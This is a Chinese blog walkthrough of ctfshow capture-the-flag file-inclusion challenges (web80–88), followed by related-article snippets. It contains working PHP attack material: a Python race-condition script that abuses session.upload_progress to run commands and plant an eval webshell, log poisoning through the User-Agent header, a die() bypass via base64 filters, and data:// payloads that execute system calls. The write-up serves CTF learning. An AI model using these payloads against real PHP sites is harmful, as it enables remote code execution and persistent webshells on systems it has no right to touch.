ctfshow文件包含篇

最新推荐文章于 2023-12-01 08:32:05 发布
最新推荐文章于 2023-12-01 08:32:05 发布
阅读量1.1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/111330362
版权

web80-81

web80

在这里插入图片描述
过滤了data协议,php

这题新思路,伪造UA写入php代码,然后包含日志文件来进行getshell,
当然这题还可以用大小写绕,因为str_replace区分大小写

?file=/var/log/nginx/access.log

在这里插入图片描述
查flag即可
在这里插入图片描述

web81

在这里插入图片描述

web82-86

在这里插入图片描述
过滤了.不能通过文件包含来进行绕过
利用session.upload_progress进行文件包含
不多说了,WMCTF也做过

import io
import sys
import requests
import threading

sessid = 'penson'
url='http://ffd7ccbf-4d5a-4096-a5eb-7773d340c7ac.chall.ctf.show/'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            url=url,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat flag.php');fputs(fopen('shell.php','w'),'<?php @eval($_POST[penson])?>');?>"},
            files={"file":('penson.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'{url}?file=/tmp/sess_{sessid}')
        if 'flag{' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()

    READ(session)

运行完事,
在这里插入图片描述
成功写入shell
查看flag,不知道这环境什么鬼,cat不能用
在这里插入图片描述

web 83

在这里插入图片描述
多了两函数,无影响,依然可以用那个条件竞争来进行文件包含
在这里插入图片描述
写shell还是非常快的

web 87

1、ctfshow web87

Penson

1、ctfshowweb87

图片

看到这个die就很容易想到绕过死亡exit了

但是由于他过滤了php,data,但是这个又不是正则匹配,而后面加了个urldecode

https://www.anquanke.com/post/id/202510#h3-4

直接用双编码

既然没禁base64那就直接base64

图片

在base64解密时会忽略不可识别的字符,phpdie长度为6,要8个为一组,凑齐

然后就能将这个die给base64解码

再访问penson.php

图片

getshell

web88

在这里插入图片描述

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤一堆东西,但是没有过滤:和data协议
在这里插入图片描述

data:text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTsgPz4
penson by 小乌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow-文件包含
m0_74456293的博客
03-27 485
ctfshow-文件包含
ctfshow文件包含web87-117
m0_62207170的博客
06-19 394
ctfshow文件包含web87-117
文件包含(ctfshow web入门)
qq_47168481的博客
11-17 3318
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
CTFshow web入门web87-文件包含10
最新发布
weixin_74336671的博客
12-01 203
把data协议也ban了,换一种方式,不直接通过当前页面进行内容的传递,使用日志包含。通过wappalyzer查看网页的banner信息,发现是nginx服务器。本题的路径是/var/log/nginx/access.log.通过抓包在UA头中插入payload,文件包含日志使代码执行。通过file读取日志,发现内容为请求行、UA头、IP地址。
CTFshow 文件包含 web87
Kradress的博客
12-12 1817
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: [email protected] # @link: https://ctfer.com */ if(isset($_GET['file'])
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
ctfshow学习记录-web入门(文件包含78-87
龟速更新的九某人
07-04 1441
ctfshow学习记录-web入门(文件包含web78-87
ctfshow web入门(文件包含
qq_53263789的博客
07-19 620
ctfshow
文件包含漏洞详解与ctfshow文件包含漏洞模块的练习
RealIiikun的博客
03-25 441
​ 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4080
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 718
文件包含之php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 719
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 6976
个人ctfshow刷题记录
web前端学习87-90(综合案例:新闻页面)
weixin_51249285的博客
11-18 1646
文章目录6 综合案例---新闻页面 6 综合案例—新闻页面 案例:新闻页面 制作页面整体可以分为两步: 搭建html结构页面. CSS样式 22-综合案例-新闻页面.html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <met
《CTFshow-Web入门》09. Web 81~90
学习学习学习......
09-01 1240
include() 利用,一句话木马之 Nginx 日志利用、条件竞争写入木马、file_put_contents() 利用,伪协议(php://filter/)、伪协议(data://)、PHP 特性之 intval()。
ctfshow 文件包含
07-28
文件包含是一种常见的安全漏洞,攻击者可以通过利用该漏洞来读取、执行或者包含服务器上的文件。根据提供的引用内容,我们可以看到三个不同的Python脚本,它们都涉及到文件包含漏洞。 在引用\[1\]中的Python脚本中,如果通过GET请求传递了一个名为"file"的参数,脚本会将该参数的值作为文件名,并通过include函数将该文件包含进来。然而,脚本中使用了正则表达式来检查文件名中是否包含一些特殊字符,如果包含则会终止脚本执行并输出"error"。这是一种简单的防护措施,但并不完全可靠。 在引用\[2\]中的Python脚本中,与引用\[1\]相比,增加了一些字符串替换操作。这些替换操作将文件名中的"php"、"data"、":"和"."替换为"???"。这样做的目的可能是为了绕过引用\[1\]中的正则表达式检查,使得攻击者可以包含一些被禁止的文件。 在引用\[3\]中的Python脚本中,与引用\[1\]和引用\[2\]相比,没有进行任何的文件名检查或替换操作。如果通过GET请求传递了一个名为"file"的参数,脚本会直接将该参数的值作为文件名,并通过include函数将该文件包含进来。 综上所述,这些Python脚本都存在文件包含漏洞,攻击者可以通过构造恶意的文件名来读取、执行或者包含服务器上的文件。为了防止此类漏洞的利用,应该对用户输入进行严格的验证和过滤,确保只包含可信的文件。 #### 引用[.reference_title] - *1* *2* *3* [ctfshow文件包含](https://blog.csdn.net/njh18790816639/article/details/115582591)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值